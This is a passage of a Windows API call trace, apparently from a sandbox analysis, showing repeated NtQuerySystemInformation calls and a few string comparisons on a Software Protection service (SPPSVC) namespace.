SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0229.699] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0229.749] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x28, ResultLength=0x0) [0229.777] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.777] NtQuerySystemInformation 